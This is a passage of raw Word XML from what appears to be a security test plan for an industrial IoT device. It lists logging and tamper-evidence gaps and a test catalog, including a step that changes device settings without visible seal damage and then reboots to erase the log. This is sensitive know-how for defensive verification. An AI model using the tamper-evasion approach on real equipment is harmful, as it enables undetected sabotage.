          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COM Error Log: ErrorEvents incl. SCPU-timeout (SRIO-10665/21357</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B894EC" w14:textId="77777777" w:rsidR="00D8789A" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707507F5" w14:textId="5FBD18B1" w:rsidR="00D8789A" w:rsidRPr="006D5B99" w:rsidRDefault="00D0445A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> No tamper </w:t>
      </w:r>
      <w:r w:rsidR="00417FBE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/sensor </w:t>
      </w:r>
      <w:r w:rsidR="00417FBE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR 3.11 detection limb unmet. An intervention avoiding visible seal damage is unrecorded and unattributable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB04D0E" w14:textId="77777777" w:rsidR="001F6E4C" w:rsidRPr="006D5B99" w:rsidRDefault="00D0445A" w:rsidP="001F6E4C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even the events the device does log carry no absolute timestamp</w:t>
      </w:r>
      <w:r w:rsidR="00410B9F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> only uptime that resets on cold start</w:t>
      </w:r>
      <w:r w:rsidR="007075F6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SRIO-15218/15398).</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001F6E4C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RQ-003 evidence is therefore not time-referenceable; a cold start both clears and de-times the record. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C7D2DF" w14:textId="635A2D15" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="00410B9F" w:rsidP="001F6E4C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00BF222D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The store is non-safety (QM), circular, cleared on cold start (SRIO-10663/6521) </w:t>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails CR 2.9/3.9 and cannot be ‘retained for the mandated period.’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC792C" w14:textId="4ACB4D3E" w:rsidR="00410B9F" w:rsidRPr="006D5B99" w:rsidRDefault="00410B9F" w:rsidP="00E35956">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-4</w:t>
      </w:r>
      <w:r w:rsidR="000A3415" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007075F6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00166470" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fusing is a valid EDR 2.13 exclusion, but a physical re-probe still yields no log entry, so RQ-003’s ‘evidence of any intervention’ remains unmet at this interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9B291" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F41F518" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7492D71D" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCB53FF" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0828B5" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684F643E" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE5BD0F" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEE8C1C" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F52BC69" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43603320" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B6541B" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4866F4" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCBC0C4" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E2892C" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B46264A" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5407E1" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D1614C" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F15A5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6D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35692853"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1E3CC39C"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C28E7C7"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850884B" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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CA2AAB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FF42B51" w14:textId="77777777" w:rsidR="00634DFD"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Enumerate the evidence that exists: read COM Error Log (IoT-Core); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D2B730" w14:textId="4535FEE6" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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read I&amp;M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BCAAC44" w14:textId="5F8BD9F3" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Functional baseline of the partial controls (CR 6.1 met; CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF50E28" w14:textId="77777777" w:rsidR="00F95D28"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Requirements-based verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693F820B" w14:textId="64982CA1"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NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446CDBED" w14:textId="379D8278" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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CA2AAB" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5D4E44" w14:textId="5C80BB37" w:rsidR="00674E1C"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Perform an </w:t>
            </w:r>
            <w:r w:rsidR="00E213CC" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> address/parameter change + reboot; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D80990A" w14:textId="5B6059AE" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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check for any retained, time-stamped evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397BE94D" w14:textId="634A3976" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Effectiveness (or not) of the evidence function under normal use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B2128D" w14:textId="6548EE4B" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Threat-mitigation verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077E946D" w14:textId="11810BC5" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713228E2" w14:textId="321D6AD5" w:rsidR="00731639"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Illegitimate intervention avoiding visible seal damage (careful sleeve removal, rotary change incl. </w:t>
            </w:r>
            <w:r w:rsidR="003B5B3A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">999), reboot; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E68E7A" w14:textId="2E9DA791" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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verify no tamper record + cold start clears log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EF4D768" w14:textId="67E3CFF1" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Proves G-1 &amp; G-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7473B92A" w14:textId="1906CB69" w:rsidR="007F0446"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MITRE ATT&amp;CK for ICS T0872;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-PHY;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F878A3" w14:textId="5C3D94A9" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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EDR 3.11 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2438E679" w14:textId="09FEFDA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SVV-4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE58B96" w14:textId="77777777" w:rsidR="004E626E"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Time-attribution analysis: capture two events across a cold start; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40998AF3" w14:textId="6759ECFD" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>show uptime resets and no absolute time exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D7454A8" w14:textId="43B6CA59" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Proves G-2 (CR 2.11 unmet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E09CB4" w14:textId="4F1943EF" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE87FE8" w14:textId="427B2063" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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CA2AAB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AFAB90D" w14:textId="77777777" w:rsidR="002E607F"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Attempt the production-gated FIT function (/fit/setfit, WO/P) on a production unit; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6DA193" w14:textId="2FF1D164" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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rejection and that the exclusion produces no log entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDC7D30" w14:textId="4403F39A" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Validates EDR 2.13 exclusion; confirms G-4 (no evidence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB774FF" w14:textId="77777777" w:rsidR="00E17F16"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7BBB6CC8" w14:textId="375032BE"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0492665" w14:textId="790ECA5C" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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54D60B44" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D230D85" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CAB2AF" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F35B7B8" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750D64E" w14:textId="77777777" w:rsidR="009A4BFD" w:rsidRPr="006D5B99" w:rsidRDefault="009A4BFD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF31C96" w14:textId="6F376946" w:rsidR="009A4BFD" w:rsidRPr="006D5B99" w:rsidRDefault="009A4BFD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ003-01 - Baseline: What Evidence the Device Actually Collects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642D3CE"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6D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FFF88" w14:textId="77777777" w:rsidR="0021004D" w:rsidRPr="006D5B99"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1004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10AE4A97" w14:textId="1638E3A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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
